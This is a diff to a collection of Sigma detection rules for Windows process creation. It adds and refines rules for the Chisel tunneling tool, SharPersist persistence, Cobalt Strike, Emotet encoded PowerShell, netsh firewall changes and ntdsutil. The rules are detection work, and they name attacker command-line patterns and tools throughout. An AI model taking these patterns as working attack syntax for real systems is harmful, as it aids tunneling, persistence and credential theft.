            - 'C:\Windows\Temp\'
            - '%temp%'
+            - '%tmp%'
            - 'C:\ProgramData\'
            - '%ProgramData%'
            - '\AppData\Local\'
@@ -0,0 +1,37 @@
+title: Chisel Tunneling Tool Usage
+id: 8b0e12da-d3c3-49db-bb4f-256703f380e5
+related:
+    - id: cf93e05e-d798-4d9e-b522-b0248dc61eaf
+      type: similar
+status: experimental
+description: Detects usage of the Chisel tunneling tool via the commandline arguments
+author: Florian Roth
+references:
+    - https://github.com/jpillora/chisel/
+    - https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
+date: 2022/09/13
+tags:
+    - attack.command_and_control
+    - attack.t1090.001
+logsource:
+    category: process_creation
+    product: windows
+detection:
+    selection_img:
+        Image|endswith: '\chisel.exe'
+    selection_param1:
+        CommandLine|contains: 
+            - 'exe client '
+            - 'exe server '
+    selection_param2:
+        CommandLine|contains:
+            - ' --socks5'
+            - ' --reverse'
+            - ' r:'
+            - ':127.0.0.1:'
+            - ' --tls-skip-verify '
+            - ':socks'
+    condition: selection_img or all of selection_param*
+falsepositives:
+    - Some false positives may occure with other tools with similar commandlines
+level: high
@@ -6,6 +6,7 @@ author: Nasreddine Bencherchali
 references:
    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
 date: 2022/07/12
+modified: 2022/09/14
 logsource:
    category: process_creation
    product: windows
@@ -19,6 +20,7 @@ detection:
            - ' > \Users\Public\'
            - ' > C:\Users\Public\'
            - ' > %TEMP%\'
+            - ' > %TMP%\'
    condition: selection
 falsepositives:
    - Legitimate admin scripts
@@ -12,7 +12,7 @@ tags:
    - car.2019-04-001
 author: Nik Seetharaman, Christian Burkard
 date: 2019/07/31
-modified: 2021/08/31
+modified: 2022/09/21
 references:
    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
    - https://twitter.com/hFireF0X/status/897640081053364225
@@ -25,8 +25,8 @@ detection:
    selection:
        ParentImage|endswith: '\DllHost.exe'
        IntegrityLevel:
-          - 'High'
-          - 'System'
+            - 'High'
+            - 'System'
        ParentCommandLine|contains:
            - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'
            - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}'
@@ -3,7 +3,7 @@ status: test
 id: ae9c6a7c-9521-42a6-915e-5aaa8689d529
 author: Wojciech Lesicki
 date: 2021/06/01
-modified: 2022/03/04
+modified: 2022/09/16
 description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.
 references:
    - https://www.cobaltstrike.com/help-windows-executable
@@ -16,14 +16,18 @@ logsource:
    category: process_creation
    product: windows
 detection:
-    selection:
-        CommandLine|contains|all:
+    selection_rundll:
+        - Image|endswith: '\rundll32.exe'
+        - OriginalFileName: RUNDLL32.EXE
+        - CommandLine|contains:
            - 'rundll32.exe'
-            - '.dll'
+            - 'rundll32 '
+    selection_params:
+        CommandLine|contains: '.dll'
        CommandLine|endswith:
            - ' StartW'
            - ',StartW'
-    condition: selection
+    condition: all of selection*
 falsepositives:
    - Unknown
 level: high
@@ -7,34 +7,39 @@ references:
    - https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/
    - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
 date: 2021/07/27
-modified: 2022/03/05
+modified: 2022/09/20
 tags:
    - attack.execution
-    - attack.t1059 
+    - attack.t1059
 logsource:
    category: process_creation
    product: windows
 detection:
-    selection1: 
+    selection1:
        CommandLine|contains: '\cmd.exe /C whoami'
        ParentImage|startswith: 'C:\Temp'
    selection2:
-        CommandLine|contains: 'conhost.exe 0xffffffff -ForceV1'
-        ParentCommandLine|contains: 
-            - '/C whoami'
-            - 'cmd.exe /C echo'
-            - ' > \\\\.\\pipe'
-    selection3:
-        CommandLine|contains: 
+        CommandLine|contains:
            - 'cmd.exe /c echo'
            - '> \\\\.\\pipe'
            - '\whoami.exe'
        ParentImage|endswith: '\dllhost.exe'
-    selection4:
+    selection3:
        Image|endswith: '\cmd.exe'
        ParentImage|endswith: '\runonce.exe'
        ParentCommandLine|endswith: '\runonce.exe'
-    condition: 1 of selection*
+    selection_special1:
+        CommandLine|contains: 'conhost.exe 0xffffffff -ForceV1'
+        ParentCommandLine|contains:
+            - '/C whoami'
+            - 'cmd.exe /C echo'
+            - ' > \\\\.\\pipe'
+    filter_special1:
+        # Internet Download Manager - Chrome Extension
+        ParentCommandLine|contains:
+            - 'C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe'
+            - 'chrome-extension://'
+    condition: 1 of selection* and (selection_special1 and not filter_special1)
 falsepositives:
    - Other programs that cause these patterns (please report)
 level: high
@@ -3,7 +3,7 @@ status: experimental
 id: 1327381e-6ab0-4f38-b583-4c1b8346a56b
 author: Christian Burkard
 date: 2021/10/26
-modified: 2022/02/02
+modified: 2022/09/20
 description: Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal
 references:
    - https://twitter.com/hexacorn/status/1448037865435320323
@@ -24,8 +24,11 @@ detection:
    selection2:
        CommandLine|contains: '.exe\..\'
    filter:
-        CommandLine|contains: '\Google\Drive\googledrivesync.exe\..\'
+        CommandLine|contains:
+            - '\Google\Drive\googledrivesync.exe\..\'
+            - '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\'
    condition: 1 of selection* and not filter
 falsepositives:
    - Google Drive
+    - Citrix
 level: high
@@ -1,23 +1,24 @@
 title: Discovery/Execution via dnscmd.exe
 id: b6457d63-d2a2-4e29-859d-4e7affc153d1
-description: | 
+description: |
    Detects an attempt to add a potentially crafted DLL as a plug in of the DNS Service.
    Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain.
    DNS zones used to host the DNS records for a particular domain
 references:
-  - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd
-  - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records
-  - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/
+    - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd
+    - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records
+    - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/
 status: experimental
 author: '@gott_cyber'
 date: 2022/07/31
+modified: 2022/09/14
 tags:
-  - attack.discovery
-  - attack.execution
-  - attack.t1543.003
+    - attack.discovery
+    - attack.execution
+    - attack.t1543.003
 logsource:
-  category: process_creation
-  product: windows
+    category: process_creation
+    product: windows
 detection:
    dnscmd:
        Image|endswith: '\dnscmd.exe'
@@ -25,6 +26,7 @@ detection:
        CommandLine|contains:
            - '/enumrecords'
            - '/enumzones'
+            - '/ZonePrint'
            - '/info'
    selection_2:
        CommandLine|contains|all:
@@ -25,7 +25,11 @@ detection:
            - 'C:\Public\'
            - '\AppData\Local\Temp\'
            - '\AppData\Roaming\Temp\'
-    condition: selection
+    filter_dell:
+        # Launched by Dell ServiceShell.exe
+        ParentImage: 'C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe'
+        CommandLine|contains: 'C:\ProgramData\Dell\UpdateService\Temp\'
+    condition: selection and not 1 of filter_*
 fields:
    - ComputerName
    - User
@@ -0,0 +1,40 @@
+title: SharPersist Usage
+id: 26488ad0-f9fd-4536-876f-52fea846a2e4
+status: experimental
+description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms
+author: Florian Roth
+references:
+   - https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit
+   - https://github.com/mandiant/SharPersist
+date: 2022/09/15
+logsource:
+   category: process_creation
+   product: windows
+tags:
+   - attack.persistence
+   - attack.t1053
+detection:
+   selection1:
+      Image|endswith: '\SharPersist.exe'
+   selection2:
+      Product: 'SharPersist'
+   selection3:
+      CommandLine|contains:
+         - ' -t schtask -c '
+         - ' -t startupfolder -c '
+   selection4:
+      CommandLine|contains|all:
+         - ' -t reg -c '
+         - ' -m add'
+   selection5:
+      CommandLine|contains|all:
+         - ' -t service -c '
+         - ' -m add'
+   selection6:
+      CommandLine|contains|all:
+         - ' -t schtask -c '
+         - ' -m add'
+   condition: 1 of selection*
+falsepositives:
+   - Unknown
+level: high
@@ -4,7 +4,7 @@ status: stable
 description: Detects all Emotet like process executions that are not covered by the more generic rules
 author: Florian Roth
 date: 2019/09/30
-modified: 2021/11/29
+modified: 2022/09/27
 tags:
    - attack.execution
    - attack.t1059.001
@@ -32,7 +32,12 @@ detection:
      - 'PQAkAGUAbgB2ADoAdABlAG0AcAArACgA'  # =$env:temp+(
      - '0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA'  # =$env:temp+(
      - '9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA'  # =$env:temp+(
-  condition: selection
+  filter:
+    CommandLine|contains:
+      - 'fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ'
+      - 'wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA'
+      - '8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA'
+  condition: selection and not filter
 fields:
  - CommandLine
  - ParentCommandLine
@@ -7,7 +7,7 @@ references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol
    - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc
 date: 2022/01/07
-modified: 2022/06/12
+modified: 2022/09/21
 logsource:
    category: process_creation
    product: windows
@@ -25,9 +25,14 @@ detection:
            - ' /g'
            - ' /u'
            - ' /p'
-    condition: all of selection_mstsc* or all of selection_cmdkey*
+    filter_mstsc_1:
+        # Example: mstsc.exe /v:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /hvsocketserviceid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /silent /wslg /plugin:WSLDVC /wslgsharedmemorypath:WSL\XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\wslg C:\ProgramData\Microsoft\WSL\wslg.rdp
+        ParentImage: 'C:\Windows\System32\lxss\wslhost.exe'
+        CommandLine|contains: 'C:\ProgramData\Microsoft\WSL\wslg.rdp'
+    condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey*
 falsepositives:
-    - Unknown
+    - WSL (Windows Sub System For Linux)
+    - Other currently unknown software
 level: medium
 tags:
    - attack.lateral_movement
@@ -7,51 +7,52 @@ references:
  - https://www.virusradar.com/en/Win32_Kasidet.AD/description
  - https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100
 date: 2020/05/25
-modified: 2022/01/07
+modified: 2022/09/13
 logsource:
  category: process_creation
  product: windows
 detection:
-  selection1:
-    Image|endswith: '\netsh.exe'
-    CommandLine|contains|all:
-      - 'firewall'
-      - 'add'
-      - 'allowedprogram'
-  selection2:
-    Image|endswith: '\netsh.exe'
-    CommandLine|contains|all:
-      - 'advfirewall'
-      - 'firewall'
-      - 'add'
-      - 'rule'
-      - 'action=allow'
-      - 'program='
-  susp_image:
-    - CommandLine|contains:
-        - '%TEMP%'
-        - ':\RECYCLER\'
-        - 'C:\$Recycle.bin\'
-        - ':\SystemVolumeInformation\'
-        - 'C:\Windows\Temp\'
-        - 'C:\Temp\'
-        - 'C:\Users\Public\'
-        - 'C:\Users\Default\'
-        - 'C:\Users\Desktop\'
-        - '\Downloads\'
-        - '\Temporary Internet Files\Content.Outlook\'
-        - '\Local Settings\Temporary Internet Files\'
-    - CommandLine|startswith:
-        - 'C:\Windows\Tasks\'
-        - 'C:\Windows\debug\'
-        - 'C:\Windows\fonts\'
-        - 'C:\Windows\help\'
-        - 'C:\Windows\drivers\'
-        - 'C:\Windows\addins\'
-        - 'C:\Windows\cursors\'
-        - 'C:\Windows\system32\tasks\'
-        - '%Public%\'
-  condition: (selection1 or selection2) and susp_image
+    selection1:
+        Image|endswith: '\netsh.exe'
+        CommandLine|contains|all:
+            - 'firewall'
+            - 'add'
+            - 'allowedprogram'
+    selection2:
+        Image|endswith: '\netsh.exe'
+        CommandLine|contains|all:
+            - 'advfirewall'
+            - 'firewall'
+            - 'add'
+            - 'rule'
+            - 'action=allow'
+            - 'program='
+    susp_image:
+        - CommandLine|contains:
+            - '%TEMP%'
+            - '%TMP%'
+            - ':\RECYCLER\'
+            - 'C:\$Recycle.bin\'
+            - ':\SystemVolumeInformation\'
+            - 'C:\Windows\Temp\'
+            - 'C:\Temp\'
+            - 'C:\Users\Public\'
+            - 'C:\Users\Default\'
+            - 'C:\Users\Desktop\'
+            - '\Downloads\'
+            - '\Temporary Internet Files\Content.Outlook\'
+            - '\Local Settings\Temporary Internet Files\'
+        - CommandLine|startswith:
+            - 'C:\Windows\Tasks\'
+            - 'C:\Windows\debug\'
+            - 'C:\Windows\fonts\'
+            - 'C:\Windows\help\'
+            - 'C:\Windows\drivers\'
+            - 'C:\Windows\addins\'
+            - 'C:\Windows\cursors\'
+            - 'C:\Windows\system32\tasks\'
+            - '%Public%\'
+    condition: (1 of selection*) and susp_image
 falsepositives:
  - Legitimate administration
 level: high
@@ -0,0 +1,27 @@
+title: Use of NetSupport Remote Access Software
+id: 758ff488-18d5-4cbe-8ec4-02b6285a434f
+status: experimental
+description: |
+    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+references:
+    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md
+author: frack113
+date: 2022/09/25
+logsource:
+    category: process_creation
+    product: windows
+detection:
+    selection:
+        - Description: NetSupport Client Configurator
+        - Product: NetSupport Remote Control
+        - Company: NetSupport Ltd
+        - OriginalFileName: PCICFGUI.EXE
+    condition: selection
+falsepositives:
+    - Legitimate use
+level: medium
+tags:
+    - attack.command_and_control
+    - attack.t1219
@@ -4,19 +4,19 @@ status: test
 description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
 author: Thomas Patzke
 references:
-  - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm
+    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm
 date: 2019/01/16
 modified: 2022/03/11  # increased level
 logsource:
-  category: process_creation
-  product: windows
+    category: process_creation
+    product: windows
 detection:
-  selection:
-    Image|endswith: '\ntdsutil.exe'
-  condition: selection
+    selection:
+        Image|endswith: '\ntdsutil.exe'
+    condition: selection
 falsepositives:
-  - NTDS maintenance
+    - NTDS maintenance
 level: medium
 tags:
-  - attack.credential_access
-  - attack.t1003.003
+    - attack.credential_access
+    - attack.t1003.003
@@ -11,7 +11,7 @@ references:
    - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN
    - https://twitter.com/frack113/status/1555830623633375232
 date: 2022/08/07
-modified: 2022/09/12
+modified: 2022/09/20
 logsource:
    category: process_creation
    product: windows
@@ -22,8 +22,9 @@ detection:
            - '~2\'
    filter:
        - ParentImage:
-            - C:\Windows\System32\Dism.exe
-            - C:\Windows\System32\cleanmgr.exe
+            - 'C:\Windows\System32\Dism.exe'
+            - 'C:\Windows\System32\cleanmgr.exe'
+            - 'C:\Program Files\GPSoftware\Directory Opus\dopus.exe'
        - ParentImage|endswith:
            - '\WebEx\WebexHost.exe'
            - '\thor\thor64.exe'
@@ -11,7 +11,7 @@ references:
    - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN
    - https://twitter.com/frack113/status/1555830623633375232
 date: 2022/08/07
-modified: 2022/08/22
+modified: 2022/09/18
 logsource:
    category: process_creation
    product: windows
@@ -20,7 +20,7 @@ detection:
        Image|contains:
            - '~1\'
            - '~2\'
-    filter:
+    filter1:
        - ParentImage:
            - C:\Windows\System32\Dism.exe
            - C:\Windows\System32\cleanmgr.exe # Spawns DismHost.exe with a shortened username (if too long)
@@ -30,7 +30,14 @@ detection:
        - Product: 'InstallShield (R)'
        - Description: 'InstallShield (R) Setup Engine'
        - Company: 'InstallShield Software Corporation'
-    condition: selection and not filter
+    filter_installers:
+        - Image|contains|all:
+            - '\AppData\'
+            - '\Temp\'
+        - Image|endswith:
+            - '~1\unzip.exe'
+            - '~1\7zG.exe'
+    condition: selection and not 1 of filter*
 falsepositives:
    - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.
 level: high
--- a/Show More
+++ b/Show More